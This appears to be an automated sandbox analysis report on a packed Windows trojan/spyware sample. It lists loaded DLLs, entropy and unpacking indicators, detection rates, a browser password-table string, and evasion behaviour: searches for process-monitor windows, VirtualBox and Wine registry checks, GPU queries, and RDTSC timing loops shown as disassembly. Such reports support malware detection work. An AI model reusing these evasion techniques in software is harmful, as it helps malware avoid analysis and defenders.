Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F7CE0	0_3_013F7CE0
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F7CE0	0_3_013F7CE0
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F7CFE	0_3_013F7CFE
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F7CFE	0_3_013F7CFE
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F7CFE	0_3_013F7CFE
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F7CE0	0_3_013F7CE0
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F7CE0	0_3_013F7CE0
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F7CE0	0_3_013F7CE0
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F7CFE	0_3_013F7CFE
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F7CFE	0_3_013F7CFE
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F7CFE	0_3_013F7CFE
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F7CE0	0_3_013F7CE0
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F7CE0	0_3_013F7CE0
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F7CE0	0_3_013F7CE0

Source: 6GNqkkKY0j.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 6GNqkkKY0j.exe

Static PE information: Section: ZLIB complexity 0.9994510825163399

Source: 6GNqkkKY0j.exe

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@11/2

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 6GNqkkKY0j.exe, 00000000.00000003.2696888589.0000000005CBE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2399004098.0000000005CBE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398888639.0000000005CD9000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 6GNqkkKY0j.exe	Virustotal: Detection: 52%
Source: 6GNqkkKY0j.exe	ReversingLabs: Detection: 55%

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe

File read: C:\Users\user\Desktop\6GNqkkKY0j.exe

Jump to behavior

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: 6GNqkkKY0j.exe

Static file information: File size 2894848 > 1048576

Source: 6GNqkkKY0j.exe

Static PE information: Raw size of ubzvudki is bigger than: 0x100000 < 0x299000

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe

Unpacked PE file: 0.2.6GNqkkKY0j.exe.2f0000.0.unpack :EW;.rsrc :W;.idata :W;ubzvudki:EW;webyiwwz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;ubzvudki:EW;webyiwwz:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: 6GNqkkKY0j.exe

Static PE information: real checksum: 0x2c42ff should be: 0x2c6750

Source: 6GNqkkKY0j.exe	Static PE information: section name:
Source: 6GNqkkKY0j.exe	Static PE information: section name: .rsrc
Source: 6GNqkkKY0j.exe	Static PE information: section name: .idata
Source: 6GNqkkKY0j.exe	Static PE information: section name: ubzvudki
Source: 6GNqkkKY0j.exe	Static PE information: section name: webyiwwz
Source: 6GNqkkKY0j.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F6637 push 00000074h; retf	0_3_013F6646
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F6637 push 00000074h; retf	0_3_013F6646
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F6637 push 00000074h; retf	0_3_013F6646
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F6637 push 00000074h; retf	0_3_013F6646
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F7127 push esp; retf	0_3_013F7136
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F7127 push esp; retf	0_3_013F7136
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F7127 push esp; retf	0_3_013F7136
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F7117 push esp; retf	0_3_013F7126
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F7117 push esp; retf	0_3_013F7126
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F7117 push esp; retf	0_3_013F7126
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F70BB push ecx; retf	0_3_013F70C2
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F70BB push ecx; retf	0_3_013F70C2
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F70BB push ecx; retf	0_3_013F70C2
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F70AF push esp; retf	0_3_013F7116
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F70AF push esp; retf	0_3_013F7116
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F70AF push esp; retf	0_3_013F7116
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F70A0 push ecx; retf	0_3_013F70AE
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F70A0 push ecx; retf	0_3_013F70AE
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F70A0 push ecx; retf	0_3_013F70AE
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F70F3 push esp; retf	0_3_013F7116
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F70F3 push esp; retf	0_3_013F7116
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F70F3 push esp; retf	0_3_013F7116
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F6637 push 00000074h; retf	0_3_013F6646
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F6637 push 00000074h; retf	0_3_013F6646
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F6637 push 00000074h; retf	0_3_013F6646
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F6637 push 00000074h; retf	0_3_013F6646
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F7127 push esp; retf	0_3_013F7136
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F7127 push esp; retf	0_3_013F7136
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F7127 push esp; retf	0_3_013F7136
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F7117 push esp; retf	0_3_013F7126
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Code function: 0_3_013F7117 push esp; retf	0_3_013F7126

Source: 6GNqkkKY0j.exe

Static PE information: section name: entropy: 7.980471642795688

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 349566 second address: 348E1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jmp 00007F0FE0B8ED45h 0x0000000d nop 0x0000000e cmc 0x0000000f push dword ptr [ebp+122D1549h] 0x00000015 jmp 00007F0FE0B8ED43h 0x0000001a call dword ptr [ebp+122D2183h] 0x00000020 pushad 0x00000021 sub dword ptr [ebp+122D219Dh], edi 0x00000027 xor eax, eax 0x00000029 ja 00007F0FE0B8ED3Ch 0x0000002f mov dword ptr [ebp+122D36DCh], ebx 0x00000035 mov edx, dword ptr [esp+28h] 0x00000039 mov dword ptr [ebp+122D36DCh], edx 0x0000003f mov dword ptr [ebp+122D3A0Fh], eax 0x00000045 jmp 00007F0FE0B8ED45h 0x0000004a jmp 00007F0FE0B8ED3Fh 0x0000004f mov esi, 0000003Ch 0x00000054 mov dword ptr [ebp+122D20C2h], edi 0x0000005a add esi, dword ptr [esp+24h] 0x0000005e cmc 0x0000005f lodsw 0x00000061 pushad 0x00000062 sub dword ptr [ebp+122D208Fh], esi 0x00000068 popad 0x00000069 add eax, dword ptr [esp+24h] 0x0000006d jmp 00007F0FE0B8ED3Ch 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 pushad 0x00000077 mov eax, dword ptr [ebp+122D3CDBh] 0x0000007d mov edx, dword ptr [ebp+122D3AFFh] 0x00000083 popad 0x00000084 jmp 00007F0FE0B8ED42h 0x00000089 nop 0x0000008a push eax 0x0000008b push edx 0x0000008c push eax 0x0000008d push edx 0x0000008e push edi 0x0000008f pop edi 0x00000090 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 348E1E second address: 348E2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B050Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4BB7B6 second address: 4BB7D2 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0FE0B8ED36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0FE0B8ED3Fh 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4BA79E second address: 4BA7B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0FE14B050Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4BAA78 second address: 4BAA80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4BAA80 second address: 4BAA84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4BAA84 second address: 4BAA9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0FE0B8ED45h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4BAD20 second address: 4BAD24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4BAD24 second address: 4BAD34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE0B8ED3Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4BAD34 second address: 4BAD4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0FE14B050Fh 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4BB01D second address: 4BB049 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE0B8ED48h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0FE0B8ED3Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4BB049 second address: 4BB04F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4BD6EA second address: 4BD76F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 jmp 00007F0FE0B8ED3Eh 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F0FE0B8ED38h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 call 00007F0FE0B8ED47h 0x0000002c pop edi 0x0000002d push 00000000h 0x0000002f call 00007F0FE0B8ED39h 0x00000034 jmp 00007F0FE0B8ED49h 0x00000039 push eax 0x0000003a push esi 0x0000003b jmp 00007F0FE0B8ED3Bh 0x00000040 pop esi 0x00000041 mov eax, dword ptr [esp+04h] 0x00000045 push ebx 0x00000046 push edi 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4BD76F second address: 4BD77B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4BD77B second address: 4BD7B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F0FE0B8ED41h 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 jmp 00007F0FE0B8ED41h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0FE0B8ED3Bh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4BD898 second address: 4BD8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jbe 00007F0FE14B050Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4BD8B0 second address: 4BD8B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4BD906 second address: 4BD90A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4BD9E9 second address: 4BD9ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4BD9ED second address: 4BD9F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4BD9F3 second address: 4BDA42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE0B8ED3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F0FE0B8ED43h 0x00000012 mov eax, dword ptr [eax] 0x00000014 jg 00007F0FE0B8ED3Ah 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F0FE0B8ED47h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4DD056 second address: 4DD05C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4DD05C second address: 4DD070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0FE0B8ED3Ch 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4DD070 second address: 4DD074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4DD4CA second address: 4DD4D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4DD4D0 second address: 4DD4E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jne 00007F0FE14B0506h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4DD9C1 second address: 4DD9D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0FE0B8ED3Dh 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4DDCB6 second address: 4DDCBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4DDCBA second address: 4DDCCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F0FE0B8ED36h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4DDCCA second address: 4DDCD6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4DDCD6 second address: 4DDCDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4DDCDA second address: 4DDCFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B0519h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4DDCFA second address: 4DDD00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4DDE50 second address: 4DDE55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4DDE55 second address: 4DDE5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4DDE5D second address: 4DDE66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4DDFB1 second address: 4DDFB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4DDFB7 second address: 4DDFD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0FE14B0511h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jc 00007F0FE14B0506h 0x00000014 rdtsc
